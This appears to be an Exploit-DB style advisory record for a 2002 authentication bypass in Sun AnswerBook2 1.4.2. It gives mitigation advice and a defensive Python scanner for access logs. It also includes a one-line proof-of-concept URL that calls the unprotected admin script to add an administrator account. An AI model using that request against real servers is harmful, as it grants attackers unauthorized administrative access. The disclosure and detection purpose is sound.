Vendor: AnswerBook2
By: SecurityFocus
CVSS: 7.5 (HIGH)
Authentication Bypass
CWE: 287
Product Name: AnswerBook2
Affected Version From: 1.4.2
Affected Version To: 1.4.2
Patch Exists: YES
Related CWE: N/A
CPE: a:sun_microsystems:answerbook2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Solaris
2002

Lack of Authentication Checks in AnswerBook2

A lack of authentication checks for certain scripts within the administration interface of AnswerBook2 versions 1.4.2 and prior, for Solaris, allows remote users to create administration accounts. By directly accessing the /cgi-bin/admin/admin script present under the AnswerBook2 dwhttpd web server, it is possible to add users to the administration interface. This will allow the attacker to read log files and manage content.

Mitigation:

Ensure that authentication checks are in place for all scripts within the AnswerBook2 administration interface.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1554/info

http://www.example.com:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
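For defenders reviewing an affected host, the following added example (not part of the original advisory or of AnswerBook2) scans web server access logs for requests to the admin script made without an authenticated user. It assumes the server writes NCSA Common Log Format, which the advisory does not state; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: the web server writes NCSA Common Log Format; the third field
# is the authenticated user, "-" when no credentials were presented.
CLF = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
ADMIN_PATH = "/cgi-bin/admin/admin"  # script named in the advisory

def find_unauthenticated_admin_calls(lines):
    """Return one finding per admin-script request logged without a user."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        host, user, when, method, target, status = m.groups()
        url = urlsplit(target)
        # Normalise percent-encoding and repeated slashes before comparing.
        path = re.sub(r"/+", "/", unquote(url.path)).rstrip("/")
        if path != ADMIN_PATH or user != "-":
            continue
        query = parse_qs(url.query)
        findings.append({
            "client": host, "time": when, "method": method,
            "status": int(status),
            "command": query.get("command", [""])[0],
            "uid": query.get("uid", [""])[0],  # account name only, never the password
            "succeeded": status.startswith("2"),
        })
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Aug/2000:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 5120',
    '198.51.100.7 - - [12/Aug/2000:10:03:41 +0000] "GET /cgi-bin/admin/admin?command=add_user&uid=newadmin&password=x&re_password=x HTTP/1.0" 200 812',
    '192.0.2.10 - root [12/Aug/2000:10:05:00 +0000] "GET /cgi-bin/admin/admin?command=list HTTP/1.0" 200 2048',
    '198.51.100.7 - - [12/Aug/2000:10:06:13 +0000] "GET /cgi-bin//admin/admin?command=add_user&uid=other HTTP/1.0" 401 120',
]

if __name__ == "__main__":
    for finding in find_unauthenticated_admin_calls(SAMPLE_LOG):
        print(finding)
```

Requests sent as POST carry no query string in the access log, so such a finding shows an empty `command` and `uid`; the path match alone still flags it for review.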